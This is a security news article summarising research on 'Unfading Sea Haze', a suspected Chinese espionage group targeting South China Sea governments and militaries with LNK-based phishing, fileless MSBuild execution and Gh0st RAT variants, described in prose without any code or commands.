Home Cyber Attack Chinese Threat Actor Attacking South China Sea Governments & military Orgs

Chinese Threat Actor Attacking South China Sea Governments & military Orgs

0
Chinese Threat Actor Attacking South China Sea Governments & military Orgs

A new threat actor, Unfading Sea Haze, has been targeting high-level organizations in South China Sea countries since 2018, as the targets and attacks suggest Chinese affiliation. 

Unfading Sea Haze uses custom tools based on the Gh0st RAT framework and .NET payloads, and their success highlights poor credential hygiene and inadequate patching on victim systems. 

Notably, the Unfading Sea Haze remained undetected for over five years, indicating advanced evasion techniques, and targeting South China Sea governments and militaries. The group lacked prior associations but used Gh0st RAT variants favored by Chinese actors. 

While one technique mirrored a feature in APT41’s “funnyswitch” backdoor, no other APT41 tools were found, which suggests Unfading Sea Haze is a skilled actor potentially linked to the broader Chinese cyber landscape, but further investigation is needed for conclusive attribution. 

The investigation into the Unfading Sea Haze threat actor revealed multiple spear-phishing campaigns (March-May 2023) utilizing ZIP archives containing LNK files disguised as documents (e.g., “SUMMARIZE SPECIAL ORDERS”). 

Clicking on these LNKs triggers malicious commands, often obfuscated by lengthy comments within the LNK itself, aiming to download a potential payload (“Recorded.log”) from a specified server while potentially checking for a process named “ekrn.exe.”. 

Attackers exploit legitimate tools like PowerShell and MSBuild to launch fileless attacks and craft LNK files that trigger PowerShell scripts to download malicious payloads. PowerShell scripts then launch MSBuild with a remote working directory containing a malicious project file. 

The project file executes in memory without writing to disk, making it difficult to detect, while attackers use social engineering tactics like file names related to current events to trick users into running the LNK files. 

Another example showcases a more intricate and obfuscated version of the same technique.

Unfading Sea Haze, a threat actor likely affiliated with the Chinese government, utilizes scheduled tasks for persistence by creating tasks with names mimicking legitimate Windows processes and combining them with DLL sideloading to execute malicious payloads. 

Additionally, they manipulate local administrator accounts by enabling them, resetting passwords, and hiding them from the login screen, as well as incorporating RMM tools and potentially establishing persistence on web servers. 

placing the malicious DLL next to the program

They used custom malware for espionage, as until 2023, they relied on SilentGh0st, TranslucentGh0st, and SharpJSHandler variants loaded by Ps2dllLoader (a tool for memory-based execution to bypass file scanning). Ps2dllLoader has AMSI/ETW patching to avoid detection by security software. 

An approximate timeline of Gh0st variations deployment.

To further evade detection, Unfading Sea Haze has transitioned to newer tactics: FluffyGh0st, InsidiousGh0st variants (more modular), and in-memory execution of .NET payloads using MSBuild.exe and remote SMB shares.  

Script for extracting encrypted data from Google Chrome

They used a combination of custom malware and off-the-shelf tools to target victim machines for espionage, and Ps2dllLoader deployed SharpJSHandler, a web shell alternative that executes encoded JavaScript code. 

For data collection, they used custom tools like an xkeylog keylogger, a browser data stealer, and a USB/WPD monitor to steal keystrokes, browsing data, and details about connected devices. 

According to Bitfender, they also used manual techniques like archive tools to collect specific files and application data from messaging apps. 

NO COMMENTS

LEAVE A REPLY

Please enter your comment!
Please enter your name here